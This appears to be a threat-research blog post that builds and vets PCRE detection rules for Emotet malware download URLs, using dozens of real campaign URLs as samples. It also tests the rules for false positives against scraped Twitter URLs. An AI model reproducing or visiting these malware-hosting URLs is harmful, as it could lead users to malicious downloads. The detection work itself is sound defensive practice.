Not much to work with yet so it's fairly static.


[Group 12] - [ ORDER.-5883789520 ]

Previous set: http://thesubservice.com/ORDER.-Document-9543529814/ http://toppprogramming.com/Cust-8328499631/ Current set: http://proiecte-pac.ro/ORDER.-5883789520/ http://proprints.dk/Rech-74779857260/ http://technetemarketing.com/CUST.-8520279770/ http://thenursesagent.com/ORDER.-9592209302/

Looking at the data in Group 2 and 9, this pattern will have: string grouping of "ORDER", "RECH", "CUST", "Cust", optional period, dash, optional "Document" string, 10-11 numbers. By the way, "rech" is shorthand for "rechnung", which is German for "bill" - you see these variations quite a bit in phishing campaigns as they focus on different regions.


Next iteration below.

[+] FOUND [+] Count: 127/696 (+34) Comment: [Group 01] - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$ [+] FOUND [+] Count: 80/696 (-9) Comment: [Group 02] - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [+] FOUND [+] Count: 190/696 Comment: [Group 03] - [ H27560xzwsS ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$ [+] FOUND [+] Count: 56/696 Comment: [Group 04] - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 86/696 (+7) Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: [Group 06] - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [+] FOUND [+] Count: 43/696 Comment: [Group 07] - [ LUqc663BAyN333-HoO ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$ [+] FOUND [+] Count: 10/696 Comment: [Group 08] - [ NUDA-X-52454-DE ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$ [+] FOUND [+] Count: 36/696 (+5) Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 10] - [ zp3x-r88-wuh.view ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 11] - [ dhl___status___2668292851 ] PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ [+] FOUND [+] Count: 31/696 Comment: [Group 12] - [ ORDER.-5883789520 ] PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust)(.)?(-Document)?-[0-9]{10,11}\/$

Round 5

Since there are only 31 URL's left I'm just going to add them all here and close out this phase.

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://albrightfinancial.com/gescanntes-Dokument-66764196575/ http://anjep.com/TBWEV-YCAP-91327-DE/ http://arroyave.net/Rech-K-682-GO1130/ http://beowulf7.com/kgcee/ http://bitach.com/RIJW-FNFE-86299-DE/ http://bobrow.com/ito-6r-w193-pkr.doc/ http://boningue.com/g843enx500-Jh/ http://carriedavenport.com/Scan-58146582290/ http://davidberman.com/gescanntes-Dokument-85218870046/ http://dentaltravelpoland.co.uk/NUN-63376893/b4fe-nn88-s.view/ http://donnjo.com/Rechnung-IOOY-776-LUV2894/ http://frossweddingcollections.co.uk/qdu-7p-wi523-hgnt.doc/ http://froufrouandthomas.co.uk/c644kNg297-uy/ http://gabrielramos.com.br/lxu-3h-ip079-zgmg.doc/ http://genxvisual.com/U494KHq064-VK/ http://gestion-arte.com.ar/CLCJY-EMIE-76216-DE/ http://imnet.ro/gcxbh/ http://johncarta.com/jexaag/ http://kowalenko.ca/D603ImA780-xxJ/ http://kratiroff.com/Scan-62799108494/ http://lapetitenina.com/eyym/ http://magmaprod.com.br/FcmUZ9GGTFaq2SYC5HTuFgc4v7/ http://masmp.com/rby-4c-rp108-sqq.doc/ http://missgypsywhitemoon.com.au/ismpce/ http://music111.com/VAQT-DYBC-27274-DE/ http://myhorses.ca/lb8TApg9aZI6PP5RWRAIdmfU/ http://onlineme.w04.wh-2.com/LD-36666076/ir5r-mu75-h.view/ http://phoneworx.co.uk/HLqwOU1uNQ7rWLWkXW6VoMheZf/ http://teed.ru/YG-47124992/bc7za-l30-v.view/ http://thegilbertlawoffice.com/m-9q-d054-gu.doc/

[Group 03] - [ H27560xzwsS ]

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://beowulf7.com/kgcee/ http://imnet.ro/gcxbh/ http://johncarta.com/jexaag/ http://lapetitenina.com/eyym/ http://magmaprod.com.br/FcmUZ9GGTFaq2SYC5HTuFgc4v7/ http://myhorses.ca/lb8TApg9aZI6PP5RWRAIdmfU/ http://phoneworx.co.uk/HLqwOU1uNQ7rWLWkXW6VoMheZf/

I'll adjust the ranges on this one but you can see from the above that it looks like two distinct campaigns. I have no doubt now that there will be more in this grouping but since it's almost over 200 URL's I'll review the entire set at the end.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,26}\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://boningue.com/g843enx500-Jh/ http://froufrouandthomas.co.uk/c644kNg297-uy/ http://genxvisual.com/U494KHq064-VK/ http://kowalenko.ca/D603ImA780-xxJ/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]

http://anjep.com/TBWEV-YCAP-91327-DE/ http://bitach.com/RIJW-FNFE-86299-DE/ http://gestion-arte.com.ar/CLCJY-EMIE-76216-DE/ http://music111.com/VAQT-DYBC-27274-DE/

Range adjustment. Curious these all end with "DE" too, possibly region based given the "Rech" stuff seen previously; will follow-up after.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://arroyave.net/Rech-K-682-GO1130/ http://donnjo.com/Rechnung-IOOY-776-LUV2894/

Added "Rech" and "Rechnung" to initial string grouping along with expanding some ranges.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$

[Group 10] - [ zp3x-r88-wuh.view ]

http://bobrow.com/ito-6r-w193-pkr.doc/ http://dentaltravelpoland.co.uk/NUN-63376893/b4fe-nn88-s.view/ http://frossweddingcollections.co.uk/qdu-7p-wi523-hgnt.doc/ http://gabrielramos.com.br/lxu-3h-ip079-zgmg.doc/ http://masmp.com/rby-4c-rp108-sqq.doc/ http://onlineme.w04.wh-2.com/LD-36666076/ir5r-mu75-h.view/ http://teed.ru/YG-47124992/bc7za-l30-v.view/ http://thegilbertlawoffice.com/m-9q-d054-gu.doc/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$

[Group 12] - [ ORDER.-5883789520 ]

http://albrightfinancial.com/gescanntes-Dokument-66764196575/ http://carriedavenport.com/Scan-58146582290/ http://davidberman.com/gescanntes-Dokument-85218870046/ http://kratiroff.com/Scan-62799108494/

Added "gescanntes" to initial string grouping (this is Dutch for "Scanned") and "Scan". Added "Dokument" to second optional grouping.

OLD: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust)(.)?(-Document)?-[0-9]{10,11}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$

Alright, now I've cleared all of the remaining matches.

[+] FOUND [+] Count: 127/696 Comment: [Group 01] - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$ [+] FOUND [+] Count: 80/696 Comment: [Group 02] - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [+] FOUND [+] Count: 199/696 (+9) Comment: [Group 03] - [ H27560xzwsS ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,26}\/$ [+] FOUND [+] Count: 56/696 Comment: [Group 04] - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 86/696 Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: [Group 06] - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [+] FOUND [+] Count: 47/696 (+4) Comment: [Group 07] - [ LUqc663BAyN333-HoO ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$ [+] FOUND [+] Count: 14/696 (+4) Comment: [Group 08] - [ NUDA-X-52454-DE ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$ [+] FOUND [+] Count: 38/696 (+2) Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$ [+] FOUND [+] Count: 11/696 (+1) Comment: [Group 10] - [ zp3x-r88-wuh.view ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 11] - [ dhl___status___2668292851 ] PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ [+] FOUND [+] Count: 35/696 (+4) Comment: [Group 12] - [ ORDER.-5883789520 ] PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$

Round 6

The next step is to validate the matches with the "-s" flag in pcre_check. This will show all of the respective matches under each PCRE. For this phase, I just eyeball it to make sure there is no overlap and what's expected in each group is present.

All of the PCRE's look solid except Group 3, which I already mentioned would need more TLC, as it overlaps with other PCRE's.

For Group 3, I'm going to visually break these down. I'll put 5 examples under each sub-grouping to show how I separated them. Some are very good for matching while others will just have to be left behind. TAKE NOTE BAD GUYS, BEING GENRIC IS GOOD, UNIQUE SNOWFLAKES ARE THE FIRST AGAINST THE WALL.

[Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ]

http://8kindsoffun.com/dhl/paket/com/pkp/appmanager/8376315127/ http://balletopia.org/dhl/paket/com/pkp/appmanager/7293445574/ http://cnwconsultancy.com/dhl/paket/com/pkp/appmanager/0622636111/ http://cookieco.com/dhl/paket/com/pkp/appmanager/8333287922/ http://cspdx.com/dhl/paket/com/pkp/appmanager/6213914600/

I think thins one would have stood out earlier had it not been clobbered by the previous PCRE. The path is very unique and ends with 10 digits. This PCRE will replace the old one for Group 3 and the other new ones will start at Group 13.


[Group 13] - [ 6572646300 ]

http://alfareklama.cz/6572646300/ http://algicom.net/6673413599/ http://bourdin.name/0014489972/ http://carbitech.net/dhl/2354409458/ http://dsltech.co.uk/0217183208/ ... http://oscartvazquez.com/DHL24/15382203695/

I'm going to create a PCRE for this one but I don't expect it to live past the FP check. There is one that stands off from the rest here with 11 numbers instead of 10 - it may be that I just don't have enough samples to account for that campaign. Finally, I'll need to exclude the previous set of matches which also end with 10 digits. To do this, I'll use a negative lookbehind to ensure once we match 10 digits, "appmanager" was not in the URL path.


[ alpha(lower) ]

http://aifesdespets.fr/kkrxtsmodw/ http://beowulf7.com/kgcee/ http://bunngalow.com/injeutznnb/ http://carbofilms.com/cms/wp-content/upgrade/jcnfkvken/ http://dolphinrunvb.com/yozypdznpb/

I don't see any good patterns in this set or the next one.

[ alpha(lower)numeric ]

http://benard.ca/z49641l/ http://jaqua.us/hid4kiwcvd84fljkpqpl/ http://krakhud.pl/rguen0ebxndrci41frworbr/ http://micromatrices.com/qwh7zxijifxsnxg20mlwa/ http://patu.ch/bgrvm2wqpjw74hz/

[Group 14] [ SCANNED/RZ7498WEXEZB ]

http://icaredentalstudio.com/APE88743TZ/ http://lbcd.se/MFV09235UA/ http://lucasliftruck.com/SCANNED/RZ7498WEXEZB/ http://meanconsulting.com/K44975X/ http://sentios.lt/W95941C/ http://triadesolucoes.com.br/SCANNED/RBA6517MHPKCZDEX/ http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/ http://zahahadidmiami.com/K38258Q/

This group was characterized by alpha(upper)numeric, which normally wouldn't be worth pattern matching, but I can see two patterns in the above that may be worth entertaining. For Group 14, I'll match on the URL's with "SCANNED" string in the path and the unique placement of the digits within the string: 2-3 alpha(upper), 4 digits, 6-9 alpha(upper).


[Group 15] [ K44975X ]

http://meanconsulting.com/K44975X/ http://sentios.lt/W95941C/ http://zahahadidmiami.com/K38258Q/

For Group 15, I'll match on 1 alpha(upper), 5 digits, 1 alpha(upper). The non-matched ones in the previous Group 14 may be an expanded part of this campaign but it's such a weak PCRE and prone to FP that I'm not going to bother with it. It's highly likely to not make the final cut either way.


[ alphanumeric long 18-26 ]

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://arosa.nl/crm/xs2ckmwotgcml95cxdhbo/ http://crosslink.ca/nWlKL3PdKyi1goahyZfbNr/ http://ideaswebstudio.com/v3mzbzaink00sndmyz/ http://infojass.com/gvtsl7ddrnjkupn50pp/

Nothing jumps out at me that would make for a good PCRE. It has a similar structure of alpha, digit, alpha but the ranges are very broad which makes it highly prone to FP again.

[ alphanumeric short 7-14 ]

http://akirmak.com/QhS33472le/ http://austinaaron.com/eCjH94174LaN/ http://campanus.cz/N6571iwA/ http://carolsgardeninn.com/vX94098JvVJ/ http://cdoprojectgraduation.com/eaSz15612O/ ... http://www.alfredomartinez.com.mx/Afz3999lDtz/ http://www.kreodesign.pl/test/O77405ccSC/ http://www.prodzakaz.com.ua/H27560xzwsS/ http://www.voloskof.net/Sn83160EngQs/ http://zonasacra.com/zH83293YizhQ/

This next one follows the same pattern I identified for Group 15: 1-5 alphanumeric, 4-5 digits, 1-5 alphanumeric. I'll just update Group 15 and see how it fairs in the FP check, but for what it's worth, it does match every single entry in this category which had 30+.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{1}[0-9]{5}[A-Z]{1}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$


Now that everything is clustered together, I'll do one final visual inspection to see if any other patterns jump out that allow us to tighten the rules up and avoid FP's.

[Group 01] - [ t5wx-x064-mzdb ]

http://12back.com/dw3wz-ue164-qqv/ http://4glory.net/p7lrq-s191-iv/ http://aconai.fr/v4OZ-PR72-gtS/ http://adamkranitz.com/gqj5ijg-y250-ex/ http://allisonhibbard.com/x4b-th601-m/

In Group 1, we can actually refine this a bit once you see the underlying pattern. Almost every part of this one changed so I'll just go back over it: 1-3 alpha, 1 digit, 1-3 alpha, dash, 1-2 alpha, 2-3 digit, dash, 1-5 alpha.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://agenity.com/EAVx829uahI723-tv/ http://argoinf.com/YFSR334KgXCe907-z/ http://artmedieval.net/RK415njzzR555-p/ http://autoradio.com.br/fRq804tvz270-tWa/ http://belief-systems.com/obn247eaC420-Z/

In Group 7, the first part of the pattern can be refined: 1-4 alphanumeric, 3 digits, 1-5 alphanumeric, 3 digits.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]

http://altius.co.in/EJZB-T-66361-DE/ http://anjep.com/TBWEV-YCAP-91327-DE/ http://aquarthe.com/AIUO-P-70826-DE/ http://bitach.com/RIJW-FNFE-86299-DE/ http://cliftonsecurities.co.uk/YJTX-NMO-51102-DE/

In Group 8 they all end with "DE" so I'll convert that part to a static string.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$ NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://archabits.com/ORDER.-AXN-60-X400251/ http://arrosio.com.ar/ORDER.-Document-SF-41-F318806/ http://arroyave.net/Rech-K-682-GO1130/ http://avenueevents.co.uk/Cust-PBP-03-D683320/ http://babyo.com.mx/Cust-Document-KEQ-04-FF065857/

In Group 9, every entry entry ends with 1-3 alpha(upper) followed by 4-6 digits.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$ NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$

The final run for the PCRE's before FP testing.

[+] FOUND [+] Count: 127/696 Comment: [Group 01] - [ t5wx-x064-mzdb ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$ [+] FOUND [+] Count: 80/696 Comment: [Group 02] - [ INVOICE-864339-98261 ] PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [+] FOUND [+] Count: 29/696 (changed to new pattern) Comment: [Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ] PCRE: ^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$ [+] FOUND [+] Count: 56/696 Comment: [Group 04] - [ RRT-13279129.dokument ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [+] FOUND [+] Count: 86/696 Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ [+] FOUND [+] Count: 62/696 Comment: [Group 06] - [ download2467 ] PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [+] FOUND [+] Count: 47/696 Comment: [Group 07] - [ LUqc663BAyN333-HoO ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$ [+] FOUND [+] Count: 14/696 Comment: [Group 08] - [ NUDA-X-52454-DE ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$ [+] FOUND [+] Count: 38/696 Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$ [+] FOUND [+] Count: 11/696 Comment: [Group 10] - [ zp3x-r88-wuh.view ] PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 11] - [ dhl___status___2668292851 ] PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ [+] FOUND [+] Count: 35/696 Comment: [Group 12] - [ ORDER.-5883789520 ] PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$ [+] FOUND [+] Count: 15/696 Comment: [Group 13] - [ 6572646300 ] PCRE: ^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$ [+] FOUND [+] Count: 3/696 Comment: [Group 14] [ SCANNED/RZ7498WEXEZB ] PCRE: ^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$ [+] FOUND [+] Count: 60/696 Comment: [Group 15] [ K44975X ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$

That leaves only 30 URL's that I was unable to reliably match - not too shabby! You can find the output of the pcre_check script showing the matches and non-matches HERE.

The current PCRE list is below.

^http:\/\/([^\x2F]+\/)+[a-zA-Z]{1,3}[0-9]{1}[a-zA-Z]{1,3}-[a-zA-Z]{1,2}[0-9]{2,3}-[a-zA-Z]{1,5}\/$ [Group 01] - [ t5wx-x064-mzdb ] ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$ [Group 02] - [ INVOICE-864339-98261 ] ^http:\/\/([^\x2F]+\/)+dhl\/paket\/com\/pkp\/appmanager\/[0-9]{10}\/$ [Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ] ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$ [Group 04] - [ RRT-13279129.dokument ] ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$ [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ] ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$ [Group 06] - [ download2467 ] ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{1,4}[0-9]{3}[a-zA-Z]{1,5}[0-9]{3}-[a-zA-Z]{1,3}\/$ [Group 07] - [ LUqc663BAyN333-HoO ] ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-DE\/$ [Group 08] - [ NUDA-X-52454-DE ] ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z]{1,3}[0-9]{4,6}\/$ [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ] ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$ [Group 10] - [ zp3x-r88-wuh.view ] ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$ [Group 11] - [ dhl___status___2668292851 ] ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$ [Group 12] - [ ORDER.-5883789520 ] ^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$ [Group 13] - [ 6572646300 ] ^http:\/\/([^\x2F]+\/)+SCANNED\/[A-Z]{2,3}[0-9]{4}[A-Z]{6,9}\/$ [Group 14] [ SCANNED/RZ7498WEXEZB ] ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$ [Group 15] [ K44975X ]

Rule Vetting

The last step is to check the PCRE's against a corpus of random URL's and see if they appear strict enough in their matching to be used in a production environment. This is critical if you plan to use them for blocking instead of just identification. I can't stress enough how important this phase is; while it's nice to be alerted on access to one of these URL's, it's solid gold if you can prevent attacks and C2 from happening in the first place. Of course, with any blocking action, the caveat is that one wrong block could spell disaster so these need to be as close to perfect as possible.

Ideally, you want to test against a large amount of URL's from your own environment that most closely resemble what traffic your users generate. Unfortunately that's not always possible, or you don't have users, so you need to either build your own corpus or find someone who can test the PCRE's for you.

There isn't much online in the way of random URL lists or logs but I've put together a few possible methods one could try to compile a fairly random set of URL's, and then I'll detail my preferred method.

The Twitter option works nicely and can generate hundreds of thousands of unique URL's per day. Given enough time, you'll have a solid base to test your PCRE's against.

To do this, you need to register an app with Twitter and get your API keys. Once you have those, I've included a Python script, twitter_scraper that you can input them into and run in a continous loop with a one-liner like the below.

while true; do sleep 5; python twitter_scraper.py >> twitter_urls; done

I've also included 2 million URL's on GitHub, which is just under the 25MB file limit compressed. These are ones that I've scraped in the past few days and should help you get started.

Typically I'll check this every so often and filter out things like URL shortening services or other sites that, for one reason or another, have bubbled up to the top of my domain list. This keeps it filled with fairly unique sites and helps improve entropy.

Below is a GIF of the sites streaming by in real time, showing some of the variety.

Once we have our list, we can run pcre_check against the URL's and see how our PCRE's fare.

$ python pcre_check.py -u twitter_urls -p emotet_pcres -s [+] FOUND [+] Count: 1290/2000000 Comment: [Group 13] - [ 6572646300 ] PCRE: ^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$ [-] MATCH [-] http://db.netkeiba.com/horse/1985105175/ ... http://www.northernminer.com/news/lukas-lundin-copper-commodity-choice/1003786598/ http://www.oita-trinita.co.jp/news/20170532318/ ... http://www.schuh.co.uk/womens/irregular-choice-x-disney-how-do-i-look?-pink-flat-shoes/1364153360/ ... http://www.yutaro-miura.com/info/event/2017/0528100324/ http://yapi.ta2o.net/maseli/2017052901/ [+] FOUND [+] Count: 2595/2000000 Comment: [Group 15] [ K44975X ] PCRE: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$ [-] MATCH [-] http://epcaf.com/c2805tw/ ... http://hobbyostrov.ru/automodels/electro-monster-1-10/tra3602g/ ... http://monipla.jp/mfpa/card2017ss/ http://ncode.syosetu.com/N0588Q/ ... http://www.nollieskateboarding.com/fs5050grind/ http://www.profootballweekly.com/2017/05/30/victor-cruz-prepared-to-produce-and-mentor-in-chicago-bears-transitioning-wr-corps/a4613p/

Using the "-s" (show matches) flag in pcre_check will allow you to manually review the false positives. If the sites don't look legitimate or match a little too perfectly, you'll want to do a little manual research to make sure they are in fact FP's and not true positives you didn't know about. I've truncated the results but above shows a few under each to give you an idea of the kind of output I'm looking for to conclude it's not up-to-par.

As you can see, Group 13 and 15 have numerous false-positives. This isn't surprising given Group 13 is simply 10 digits and Group 15 is a small range of alpha, digits, alpha, which continued to repeat itself throughout my analysis.

Additionally, I sent these PCRE's to some fellow miscreant punchers who ran them through over billions of URL's from their environment and received similar output with FP's only for Group 13 and 15.

The last check I'll perform for this set is to remove the trailing forward slash ("/") that was included in the PCRE's. The reason for this is that, while my Emotet seed list all included the forward slash, the URL's I'm scraping may not have it and I just want to try to further identify any potential issues.

$ python pcre_check.py -p emotet_pcres_mod -u twitter_urls

Nadda. Fantastic!


All in all, 13 total PCRE's make the cut and cover the seen Emotet download URL's. These will provide good historical forensic capability and good passive blocking for future victims of these campaigns.

With that, the below is the final list for publishing and available on GitHub, along with all of the above iterations.

